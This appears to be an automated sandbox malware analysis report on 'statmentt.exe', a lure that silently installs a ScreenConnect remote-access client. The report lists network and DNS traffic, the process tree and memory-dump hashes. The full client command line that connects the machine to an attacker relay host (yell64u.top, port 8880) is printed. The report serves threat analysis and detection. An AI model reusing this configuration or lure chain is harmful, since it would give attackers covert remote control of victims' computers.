                                                                                            KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                                            OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 19, 2024 17:29:15.967503071 CET497318880192.168.2.485.239.34.190
                                                                                            Dec 19, 2024 17:29:16.087486982 CET88804973185.239.34.190192.168.2.4
                                                                                            Dec 19, 2024 17:29:16.087635994 CET497318880192.168.2.485.239.34.190
                                                                                            Dec 19, 2024 17:29:17.132167101 CET497318880192.168.2.485.239.34.190
                                                                                            Dec 19, 2024 17:29:17.252325058 CET88804973185.239.34.190192.168.2.4
                                                                                            Dec 19, 2024 17:29:17.568722010 CET88804973185.239.34.190192.168.2.4
                                                                                            Dec 19, 2024 17:29:17.605510950 CET497318880192.168.2.485.239.34.190
                                                                                            Dec 19, 2024 17:29:17.725555897 CET88804973185.239.34.190192.168.2.4
                                                                                            Dec 19, 2024 17:29:18.056612015 CET88804973185.239.34.190192.168.2.4
                                                                                            Dec 19, 2024 17:29:18.156790972 CET497318880192.168.2.485.239.34.190
                                                                                            Dec 19, 2024 17:29:18.248184919 CET88804973185.239.34.190192.168.2.4
                                                                                            Dec 19, 2024 17:29:18.344376087 CET497318880192.168.2.485.239.34.190
                                                                                            Dec 19, 2024 17:29:19.506140947 CET497318880192.168.2.485.239.34.190
                                                                                            Dec 19, 2024 17:29:19.506520033 CET497318880192.168.2.485.239.34.190
                                                                                            Dec 19, 2024 17:29:19.626833916 CET88804973185.239.34.190192.168.2.4
                                                                                            Dec 19, 2024 17:29:19.626878977 CET88804973185.239.34.190192.168.2.4
                                                                                            Dec 19, 2024 17:29:19.626909971 CET88804973185.239.34.190192.168.2.4
                                                                                            Dec 19, 2024 17:29:19.626938105 CET88804973185.239.34.190192.168.2.4
                                                                                            Dec 19, 2024 17:29:19.626972914 CET88804973185.239.34.190192.168.2.4
                                                                                            Dec 19, 2024 17:29:20.424957991 CET88804973185.239.34.190192.168.2.4
                                                                                            Dec 19, 2024 17:29:20.547399044 CET497318880192.168.2.485.239.34.190
                                                                                            Dec 19, 2024 17:30:20.438169003 CET497318880192.168.2.485.239.34.190
                                                                                            Dec 19, 2024 17:30:20.558125019 CET88804973185.239.34.190192.168.2.4
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 19, 2024 17:29:15.387605906 CET6280953192.168.2.41.1.1.1
                                                                                            Dec 19, 2024 17:29:15.934417009 CET53628091.1.1.1192.168.2.4
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Dec 19, 2024 17:29:15.387605906 CET192.168.2.41.1.1.10xf51aStandard query (0)yell64u.topA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Dec 19, 2024 17:29:15.934417009 CET1.1.1.1192.168.2.40xf51aNo error (0)yell64u.top85.239.34.190A (IP address)IN (0x0001)false

                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:11:29:07
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Users\user\Desktop\statmentt.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\statmentt.exe"
                                                                                            Imagebase:0xbc0000
                                                                                            File size:5'652'448 bytes
                                                                                            MD5 hash:054251D2E1DE783B0FAED842D64FD893
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1802003851.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1785575924.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:11:29:09
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                                                                                            Imagebase:0x1c0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:11:29:09
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                            Imagebase:0x7ff6721a0000
                                                                                            File size:69'632 bytes
                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:3
                                                                                            Start time:11:29:09
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 8DDF4D7DFA864A88ED87F00705A0EDAF C
                                                                                            Imagebase:0x1c0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:11:29:10
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6876625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                            Imagebase:0x130000
                                                                                            File size:61'440 bytes
                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:11:29:11
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6D5F870693EF3B6FD3A6AF241B788648
                                                                                            Imagebase:0x1c0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:11:29:12
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding B9FCDEB162140880EF803EB7EC0353E8 E Global\MSI0000
                                                                                            Imagebase:0x1c0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:11:29:12
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=IT&c=&c=&c=IT%20team&c=&c=&c=&c="
                                                                                            Imagebase:0xf60000
                                                                                            File size:95'520 bytes
                                                                                            MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:8
                                                                                            Start time:11:29:14
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "15e3aa5a-03ad-43c1-8c56-797fd84cc894" "User"
                                                                                            Imagebase:0xa0000
                                                                                            File size:601'376 bytes
                                                                                            MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.3027011781.0000000002441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:9
                                                                                            Start time:11:29:17
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "5082607d-6583-424c-b175-f03711434b52" "System"
                                                                                            Imagebase:0xd50000
                                                                                            File size:601'376 bytes
                                                                                            MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Reset < >
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C8${/
                                                                                              • API String ID: 0-4231431693
                                                                                              • Opcode ID: 291533a129be21e5e34088d01b3009f10b48af1af1ab25e22f7eb81fb079db80
                                                                                              • Instruction ID: d5cddf8180e6da9fd81560b11ae9ae04e3d17564ed768381cdd80c3528853993
                                                                                              • Opcode Fuzzy Hash: 291533a129be21e5e34088d01b3009f10b48af1af1ab25e22f7eb81fb079db80
                                                                                              • Instruction Fuzzy Hash: AA61C0313103024BC716AB7CE89466EBFEAFBD52513409669E519CB391EF74FC968B80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (bq$Hbq
                                                                                              • API String ID: 0-4081012451
                                                                                              • Opcode ID: 2cba2a1b09bf503d2cd5e532952378b9954eee92b8e8920d0d3884a76a5c6266
                                                                                              • Instruction ID: fed4bca5ded938f52fc64eed409b3ad988a55e010c57d7a1fdd0246c0883b62c
                                                                                              • Opcode Fuzzy Hash: 2cba2a1b09bf503d2cd5e532952378b9954eee92b8e8920d0d3884a76a5c6266
                                                                                              • Instruction Fuzzy Hash: 1441B135B042498FCF159FADC4946AFFBA2FF85250B14846AEA05CB385DA34ED058BA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (bq
                                                                                              • API String ID: 0-149360118
                                                                                              • Opcode ID: 7e8969e5a03e1f52d5678a5089abc25b85faa97dbd90b649034ac5742df13ec6
                                                                                              • Instruction ID: a785f1fdf519e6bed1b1f1a5d3974deef0cb3da9c5c5a6e53effde98eb7b9116
                                                                                              • Opcode Fuzzy Hash: 7e8969e5a03e1f52d5678a5089abc25b85faa97dbd90b649034ac5742df13ec6
                                                                                              • Instruction Fuzzy Hash: 6D612534B106158FCB14DF69D89496EB7F2FF8D315B1085A8E6069B365DB30EC01DB41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K]
                                                                                              • API String ID: 0-3798347547
                                                                                              • Opcode ID: 0d031e90a930da423a4ad0b46c81db81b825e0ae282e078bb7e4489160d7104b
                                                                                              • Instruction ID: 3d8864d2f61bacb0fdaf3b96077d7d01e3e2cacaa3e61a14ee835dd2909e9967
                                                                                              • Opcode Fuzzy Hash: 0d031e90a930da423a4ad0b46c81db81b825e0ae282e078bb7e4489160d7104b
                                                                                              • Instruction Fuzzy Hash: 96319075A053405FCB42DF6998A049EFFF1EF9625070584ABD948CF366EA30EC09C7A2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Te^q
                                                                                              • API String ID: 0-671973202
                                                                                              • Opcode ID: 128c55415417e8731c39d63902099ae67831f94deaf04a5f76076c9b64cb1dd3
                                                                                              • Instruction ID: a7261a2e6f8a585c99b6c1204486a45acf33279935ef635f1e21de85af110992
                                                                                              • Opcode Fuzzy Hash: 128c55415417e8731c39d63902099ae67831f94deaf04a5f76076c9b64cb1dd3
                                                                                              • Instruction Fuzzy Hash: AF312C74604B018FD734DF69D88465BFBF2FB88321B104B2DE5A68B7A1D730A949CB91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K]
                                                                                              • API String ID: 0-3798347547
                                                                                              • Opcode ID: fa9dcfb4d08518abe94d0b1249a9c7ee4fbf4784975baa6ce44b8fae9d2caf07
                                                                                              • Instruction ID: 161e17fd3f39b4ff1fa74459dee5e17d834a0809d4f80ae8e808dd6750672c72
                                                                                              • Opcode Fuzzy Hash: fa9dcfb4d08518abe94d0b1249a9c7ee4fbf4784975baa6ce44b8fae9d2caf07
                                                                                              • Instruction Fuzzy Hash: 07214775B002018BCB41DF6DD89455EFBE2FFA9251704C46AE909DF32AEA30EC048BA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (bq
                                                                                              • API String ID: 0-149360118
                                                                                              • Opcode ID: 346431063c664f5ede4fbf4d601812978d7a9250934cb3bcc02db63102387ed9
                                                                                              • Instruction ID: 9cfe38f5141c9f9fafa50a7befe41c1696d015980c63821a1e6b01c32dec87f7
                                                                                              • Opcode Fuzzy Hash: 346431063c664f5ede4fbf4d601812978d7a9250934cb3bcc02db63102387ed9
                                                                                              • Instruction Fuzzy Hash: B61190763042498FCB16DF6DD890A2ABBE2FFCD260755845EE59ACB351DA31EC018B90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (bq
                                                                                              • API String ID: 0-149360118
                                                                                              • Opcode ID: 9ed75a88ac5ebc0c05301e55318576c8453d38c104516c8006f4f0d0e47d846d
                                                                                              • Instruction ID: 096a238f125ae79aa27dd47af7b2640d8a3c5007efde45ebfe6363296e5f0723
                                                                                              • Opcode Fuzzy Hash: 9ed75a88ac5ebc0c05301e55318576c8453d38c104516c8006f4f0d0e47d846d
                                                                                              • Instruction Fuzzy Hash: CB116D763002059FCB15DB6DD890E2BBBE6FBCC260754846DE55A8B350DA31EC018B50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Te^q
                                                                                              • API String ID: 0-671973202
                                                                                              • Opcode ID: c0823fbf96601a084529065ca7321d5fac624cba6cc199e1e756695925aea141
                                                                                              • Instruction ID: 3efbc4656741dc017c8a4ca02028c81072799cc046e1a30970161ead07ca1984
                                                                                              • Opcode Fuzzy Hash: c0823fbf96601a084529065ca7321d5fac624cba6cc199e1e756695925aea141
                                                                                              • Instruction Fuzzy Hash: 13F0F6717002406BC315DB5AE89496BFFDEEBD97A0B14846FED098F391DA329C0683E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d23d91b85859467d726fce9d791545cbe579accda9f7ad81c79971fb549caf9
                                                                                              • Instruction ID: bddfe0dc9312f0abddeedec46fc904c07636e4ea028272f2de763e32e2309910
                                                                                              • Opcode Fuzzy Hash: 3d23d91b85859467d726fce9d791545cbe579accda9f7ad81c79971fb549caf9
                                                                                              • Instruction Fuzzy Hash: 3DE14D35A0420ADFCF11CF99C8848AEBBB2FF49314B248499EA55A7361D731ED56CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5f573eb2041316dba2ae8b9d4447a7ac6aef1a8f9a8e41291260cbc55775cded
                                                                                              • Instruction ID: d813f52cedf985789a9e8eb18ab9f139a06599afa46486cec735a0c4f7979129
                                                                                              • Opcode Fuzzy Hash: 5f573eb2041316dba2ae8b9d4447a7ac6aef1a8f9a8e41291260cbc55775cded
                                                                                              • Instruction Fuzzy Hash: CE913B30B003158BCB15DF69E84869EFBF6FF85321B108669E9199F394DB70AC46CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 59cf632e60e4e070f953205720e6cc9b186177ec36b785b37ee5098574210211
                                                                                              • Instruction ID: b94f54cb8011c8b3e4f17b46c85254af988b387db1262123d3e571b6677e6bff
                                                                                              • Opcode Fuzzy Hash: 59cf632e60e4e070f953205720e6cc9b186177ec36b785b37ee5098574210211
                                                                                              • Instruction Fuzzy Hash: 23912B74B002059FCB55DF69D498A6EBBF6FF88341B108529E91ADB355DB70EC05CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 932657631c66392556a76234d9c65787587b2c099af685f2082f0de022661c60
                                                                                              • Instruction ID: 7b7e8faa933ceb47f0b9c1b79e2f1b5a8f662fa26bf01b70c0521327a7195346
                                                                                              • Opcode Fuzzy Hash: 932657631c66392556a76234d9c65787587b2c099af685f2082f0de022661c60
                                                                                              • Instruction Fuzzy Hash: 8A811A74B002059FCB15DF69D498A6EBBF6FB88341B108529E91ADB3A5DF74EC05CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 48493f67406de1153ca67ec65757f661d0d03691692004d68c48c084344c3e97
                                                                                              • Instruction ID: 080ace18c7338b8bf88f35571a87ea2ccfbaa2034365450ecd858260d9bc5748
                                                                                              • Opcode Fuzzy Hash: 48493f67406de1153ca67ec65757f661d0d03691692004d68c48c084344c3e97
                                                                                              • Instruction Fuzzy Hash: 51616F32A006058FCB45DF68D8544AEFBF2FFD9210719856EE60ADB391DB71AC058B50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 53f601322b6950a657ed7cb4e46fe827779eed26ed6597e3588cf9ac0ce2adf6
                                                                                              • Instruction ID: 6d0e195d21da5f2612c32a89c70f61ce3406d7d0ca251224ea56978e5a19d285
                                                                                              • Opcode Fuzzy Hash: 53f601322b6950a657ed7cb4e46fe827779eed26ed6597e3588cf9ac0ce2adf6
                                                                                              • Instruction Fuzzy Hash: CB714135A106008FC751DF29C89495ABBF6FF9971175089AAE95ADB771DB30EC01CF80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2b75f0be6d6e2c4034274858a1227ddda40c46e41edefcaf69a1cd24a87f0606
                                                                                              • Instruction ID: eee0d1057bb50a19da3e31f0f3897d5b74f6fde0290343f89bbe8db9d52b1199
                                                                                              • Opcode Fuzzy Hash: 2b75f0be6d6e2c4034274858a1227ddda40c46e41edefcaf69a1cd24a87f0606
                                                                                              • Instruction Fuzzy Hash: 8F513B75E106198FCB44CFA9C88499EBBF6FF8A700B21816AE505EF361DB71AD05CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2d10d252aeac2f5c6435eeae89f37a07c7e2ba23e24f5b5d5507c5ce755e6e73
                                                                                              • Instruction ID: a8f28053b80226464f391175e2a557c3a18d78b1822da3fa7acfbf144af1959a
                                                                                              • Opcode Fuzzy Hash: 2d10d252aeac2f5c6435eeae89f37a07c7e2ba23e24f5b5d5507c5ce755e6e73
                                                                                              • Instruction Fuzzy Hash: D361ED74A106058FC790DF69C88485ABBF6FF8961175189AAE95ADB735DB30EC01CF80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2e67740748a6b5b66edbd768af5b3bc6d1406f1855f32b866ff253f44ced2128
                                                                                              • Instruction ID: 7d37e73f54be578d80f1e1447b4d0c6c0e107adcf1494828f3c1c978fc9017f1
                                                                                              • Opcode Fuzzy Hash: 2e67740748a6b5b66edbd768af5b3bc6d1406f1855f32b866ff253f44ced2128
                                                                                              • Instruction Fuzzy Hash: 67517B70E10309DFDB01DFA8E858B9DBBF1FF88310F109659E518AB294DB75A985CB90
                                                                                              Memory Dump Source
